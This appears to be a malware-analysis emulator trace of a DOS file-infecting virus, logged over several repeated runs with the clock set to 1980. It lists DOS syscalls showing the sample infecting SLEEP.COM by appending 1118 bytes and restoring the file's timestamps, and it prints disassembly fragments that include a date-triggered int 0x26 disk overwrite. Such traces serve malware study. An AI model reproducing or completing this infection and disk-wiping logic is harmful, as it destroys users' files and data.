0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:33.782790124Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:33.785851369Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:33.790690801Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:33.793593233Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:33.800836807Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.80853583Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:33.816573647Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh
0x12c8a: je 0x12c84
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]
0x12c93: mov byte ptr [si], dl
0x12c95: mov ax, 0x4301
0x12c98: xor cx, cx
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02
0x12ca9: int 0x21
0x12cab: jb 0x12c5e
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax
0x12cb3: xchg ax, bx
0x12cb4: mov ah, 0x40
2018-12-25T12:39:33.819670537Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.839917806Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:33.842351934Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.858820733Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.866659444Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.870067178Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.87440719Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:33.875708547Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.878054128Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.887680464Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.889406629Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.891007334Z 62 PC: 12d0b | Close file
2018-12-25T12:39:33.89960948Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.910917244Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:33.913492524Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.919397959Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.927189828Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.929506354Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.937863457Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.940311684Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.947676412Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.951451937Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.955220358Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.95777129Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.959231752Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.962526446Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.97168305Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.974470098Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.976692128Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.986507381Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.997934127Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.00160097Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.008985326Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.016260064Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.019029468Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.030573412Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.032951431Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.040645801Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.045897176Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.048971413Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.051996451Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.055816074Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.058233874Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.067936281Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.077438415Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.079229899Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.093688375Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.106663634Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c
0x12b75: jmp 0x12d21
0x12b78: and ah, bh
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl
0x12b83: in al, dx
0x12b84: sub sp, 0x2c
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a
0x12b8c: lea dx, word ptr [bp - 0x2c]
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e
0x12b93: mov cx, 0x10
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.109601282Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:34.114619293Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:33.827432169Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a61
0x12a5f: jmp 0x12a7e
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq
0x12a65: mov cx, 0x100
0x12a68: int 0x26
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]
0x12a80: xor al, ah
0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:33.831364796Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:33.835146665Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:33.838028024Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:33.839512154Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:33.843932135Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.849988708Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:33.855350394Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh
0x12c8a: je 0x12c84
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]
0x12c93: mov byte ptr [si], dl
0x12c95: mov ax, 0x4301
0x12c98: xor cx, cx
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02
0x12ca9: int 0x21
0x12cab: jb 0x12c5e
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax
0x12cb3: xchg ax, bx
0x12cb4: mov ah, 0x40
2018-12-25T12:39:33.860305806Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.880684901Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:33.883112758Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.897871741Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.905024931Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.907039754Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.909469368Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:33.91116927Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.91409457Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.924205486Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.926570986Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.928122219Z 62 PC: 12d0b | Close file
2018-12-25T12:39:33.937302743Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.949023432Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:33.952049793Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.960464053Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.968344173Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.970242899Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.981516743Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.984024927Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.991198542Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.994230307Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.99762196Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.000399337Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.001833861Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.004699437Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.014110597Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.016331992Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.018717158Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.028071661Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.039361745Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.043134795Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.051182004Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.058394278Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.060357074Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.067482433Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.069238502Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.07664413Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.080792182Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.083777619Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.086732205Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.08973811Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.097296311Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.107497765Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.111147815Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.113446448Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.122300014Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.134181799Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c
0x12b75: jmp 0x12d21
0x12b78: and ah, bh
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl
0x12b83: in al, dx
0x12b84: sub sp, 0x2c
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a
0x12b8c: lea dx, word ptr [bp - 0x2c]
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e
0x12b93: mov cx, 0x10
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.13739787Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:34.141812149Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:34.010036949Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a61
0x12a5f: jmp 0x12a7e
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq
0x12a65: mov cx, 0x100
0x12a68: int 0x26
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]
0x12a80: xor al, ah
0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:34.01367191Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:34.017354084Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:34.02029957Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:34.02167709Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:34.029022591Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.033062651Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:34.037327445Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh
0x12c8a: je 0x12c84
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]
0x12c93: mov byte ptr [si], dl
0x12c95: mov ax, 0x4301
0x12c98: xor cx, cx
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02
0x12ca9: int 0x21
0x12cab: jb 0x12c5e
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax
0x12cb3: xchg ax, bx
0x12cb4: mov ah, 0x40
2018-12-25T12:39:34.039305173Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:34.051248729Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:34.053002525Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.057590061Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:34.059507136Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.061239184Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.06345525Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:34.064419014Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.065792155Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:34.071670754Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.073728522Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:34.075334226Z 62 PC: 12d0b | Close file
2018-12-25T12:39:34.083276658Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:34.097073282Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:34.099696688Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.107648093Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.113817123Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.115881153Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.126660311Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.128336008Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.134682666Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.138275836Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.140877225Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.14335605Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.14570958Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.147943641Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.15660547Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.159428475Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.161074643Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.168527837Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.178429153Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.181419209Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.187886163Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.194162882Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.196628388Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.206709271Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.208493047Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.216153829Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.219113831Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.221883524Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.225542347Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.227232127Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.229532438Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.239532606Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.241615259Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.242960336Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.251348973Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.260689981Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c
0x12b75: jmp 0x12d21
0x12b78: and ah, bh
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl
0x12b83: in al, dx
0x12b84: sub sp, 0x2c
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a
0x12b8c: lea dx, word ptr [bp - 0x2c]
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e
0x12b93: mov cx, 0x10
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.262683984Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:34.26695011Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:34.046050223Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a61
0x12a5f: jmp 0x12a7e
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq
0x12a65: mov cx, 0x100
0x12a68: int 0x26
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]
0x12a80: xor al, ah
0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:34.049188109Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:34.051949018Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:34.055804273Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:34.057909528Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:34.06370641Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.069848568Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:34.076188078Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh
0x12c8a: je 0x12c84
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]
0x12c93: mov byte ptr [si], dl
0x12c95: mov ax, 0x4301
0x12c98: xor cx, cx
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02
0x12ca9: int 0x21
0x12cab: jb 0x12c5e
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax
0x12cb3: xchg ax, bx
0x12cb4: mov ah, 0x40
2018-12-25T12:39:34.079427081Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:34.097722524Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:34.099497396Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.110720356Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:34.117086824Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.119662438Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.123146562Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:34.124896108Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.127353932Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:34.135161826Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.137429138Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:34.138599095Z 62 PC: 12d0b | Close file
2018-12-25T12:39:34.144262715Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:34.156735787Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:34.158539305Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.16355593Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.174769151Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.176602103Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.187325003Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.188840637Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.192945457Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.195176674Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.197381748Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.199327531Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.200358119Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.20236063Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.2079469Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.209683382Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.213708116Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.219423246Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.229070027Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.232329944Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.239653417Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.246552107Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.249686408Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.25942966Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.261228274Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.26859666Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.271379681Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.273857422Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.289626545Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.291318289Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.293470243Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.303090398Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.305330822Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.306851825Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.31574618Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.32606042Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c
0x12b75: jmp 0x12d21
0x12b78: and ah, bh
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl
0x12b83: in al, dx
0x12b84: sub sp, 0x2c
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a
0x12b8c: lea dx, word ptr [bp - 0x2c]
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e
0x12b93: mov cx, 0x10
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.328157537Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:34.333379728Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:34.691110978Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a61
0x12a5f: jmp 0x12a7e
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq
0x12a65: mov cx, 0x100
0x12a68: int 0x26
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]
0x12a80: xor al, ah
0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:34.693785747Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:34.696570561Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:34.700413661Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:34.705912009Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:34.71652027Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.7339583Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:34.740039264Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh
0x12c8a: je 0x12c84
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]
0x12c93: mov byte ptr [si], dl
0x12c95: mov ax, 0x4301
0x12c98: xor cx, cx
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02
0x12ca9: int 0x21
0x12cab: jb 0x12c5e
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax
0x12cb3: xchg ax, bx
0x12cb4: mov ah, 0x40
2018-12-25T12:39:34.742944466Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:34.758897728Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:34.760986042Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.768201456Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:34.770950911Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.773499095Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.777002872Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:34.778340787Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.780339634Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:34.78924239Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.791553155Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:34.79388576Z 62 PC: 12d0b | Close file
2018-12-25T12:39:34.802322767Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:34.811980474Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:34.814769286Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.822329971Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.828893648Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.831104606Z 67 PC: 12ca2 | Get or set file attributes (See above)
